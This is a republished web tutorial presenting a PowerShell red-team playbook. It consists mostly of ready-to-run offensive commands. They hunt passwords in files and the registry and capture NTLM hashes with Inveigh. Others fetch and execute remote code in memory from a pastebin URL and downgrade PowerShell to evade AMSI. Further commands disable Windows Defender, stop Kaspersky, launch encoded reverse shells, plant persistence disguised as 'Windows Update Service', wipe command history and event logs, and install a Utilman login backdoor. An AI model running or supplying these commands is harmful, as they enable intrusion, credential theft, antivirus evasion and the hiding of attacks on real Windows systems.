PowerShell Red Team Guide: Core Hacking Skills Explained
This tutorial walks through essential PowerShell techniques for red‑team operations, covering command basics, credential harvesting, execution‑policy bypass, file download, in‑memory payloads, downgrade attacks, anti‑AV evasion, persistence, hidden execution, command‑history handling, scheduled‑task abuse, session management, log cleaning, and a stealthy Utilman backdoor.
Why PowerShell Is Favored by Red Teams
Pre‑installed and Microsoft‑signed : native binary, often ignored by AV.
Feature‑rich : remote sessions, credential collection, system configuration, in‑memory payload execution.
Stealthy : can run without writing files to disk.
Core PowerShell Commands for Linux Users
File viewing and navigation equivalents: PS > type example.txt Recursive directory tree: PS > tree /F Variable handling for non‑ASCII paths:
PS > $items = Get-ChildItem
PS > cd $items[4].FullNameCredential Harvesting – First Step to Lateral Movement
findstr – Native Password Hunter
PS > findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.gif *.ps1 *.yml/S = recursive, /I = case‑insensitive, /M = list matching file names only.
Registry – Additional Credential Store
PS > reg query HKLM /f password /t REG_SZ /s PS > reg query HKCU /f password /t REG_SZ /s PS > reg query "HKCU\Software\ORL\WinVNC3\Password" PS > reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" PS > reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" PS > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"LaZagne – General‑Purpose Credential Extractor
Run LaZagne from PowerShell to dump passwords from browsers, email clients, Wi‑Fi profiles, FTP tools and databases.
SMB Hash Capture – NTLMv1/v2 Theft
Serve a malicious .lnk file to force Windows to send NTLM hashes to a listener. Capture with Inveigh:
PS > powershell -ep bypass
PS > . .\Inveigh.ps1
PS > Invoke-Inveigh -ConsoleOutput Y -NBNS Y -HTTPS Y -PROXY YCrack captured hashes with Hashcat mode 5600.
Execution Policy Bypass & File Download
Bypass for the current session: PS > powershell -ep bypass Permanent bypass (requires admin):
PS > Set-ExecutionPolicy Bypass -Scope LocalMachine -ForceDownload scripts:
PS > iwr https://raw.githubusercontent.com/xxx/script.ps1 -OutFile script.ps1 PS > wget https://raw.githubusercontent.com/xxx/script.ps1 -O script.ps1In‑memory execution without a file:
PS > iex (Invoke-WebRequest -Uri 'http://pastebin.com/raw/xxx')Downgrade Attack
Run an older PowerShell version (e.g., 2.0) to bypass script block logging, transcription and AMSI:
PS > powershell -version 2Anti‑Virus Evasion
Check Defender status: PS > Get-Service -Name windefend Disable Windows Defender:
PS > Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableNetworkProtection AuditMode -MAPSReporting Disabled -SubmitSamplesConsent NeverSend -EnableControlledFolderAccess DisabledStop Kaspersky services (local install):
PS > Stop-Service -Name KAVFS,kavfsslp,klnagent -ForceBase64 Encoding & Reverse Shell
PS > [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Write-Host "Hackers-Arise!"'))
PS > powershell -e "<base64>"Encoded payload can be customized on revshells.com and executed to obtain a remote shell.
Profile Persistence – Auto‑Run on Startup
PS > Add-Content -Path $Profile -Value "C:\Windows\Temp\script.ps1"
PS > Set-ExecutionPolicy Bypass -Scope LocalMachine -ForceHidden Execution
Run PowerShell silently:
PS > Start-Process powershell.exe -WindowStyle Hidden -ArgumentList "-ExecutionPolicy Bypass -File C:\Windows\Temp\script.ps1"Suppress profile loading:
PS > powershell.exe -NoProfile -Command "Write-Output 'Hackers-Arise!'"Command History & Process Command Line
View recent PowerShell history (default 50 entries):
PS > Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"Overwrite the history file to erase traces:
PS > Set-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Value ""List each process’s command line (useful for finding credentials, IPs, etc.):
PS > gwmi win32_process | select CommandLineScheduled Tasks – Persistence & Privilege Escalation
Export all tasks and search for high‑privilege entries:
PS > schtasks /query /fo LIST /v > schtask.txtCreate a malicious task:
PS > schtasks /create /tn "Windows Update Service" /tr "C:\Windows\Temp\hackers-arise.exe" /sc hourly /mo 3 /ru SystemRun, query, or delete the task:
PS > schtasks /run /tn "Windows Update Service"
PS > schtasks /query /tn "Windows Update Service"
PS > schtasks /delete /tn "Windows Update Service" /fSession Management & Log Cleaning
List active user sessions: PS > quser # or qwinsta Force logoff of a specific user:
PS > logoff ((quser | Where-Object { $_ -match 'username' }) -split '\s+' )[2]Delete a user’s profile directory after terminating the session: PS > cmd.exe /c "rd /s /q C:\Users\username" Clear event logs to hide activity:
PS > Clear-EventLog Security,System,Application; "Windows PowerShell","Microsoft-Windows-PowerShell/Operational","Microsoft-Windows-WMI-Activity/Operational" | ForEach-Object { & "$env:windir\System32\wevtutil.exe" cl $_ }Utilman Backdoor – Hidden High‑Privilege Shell at Login
Replace the Utilman.exe debugger with cmd.exe (requires SYSTEM):
PS > reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /fDisable Network Level Authentication to allow password‑less RDP:
PS > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /fSigned-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
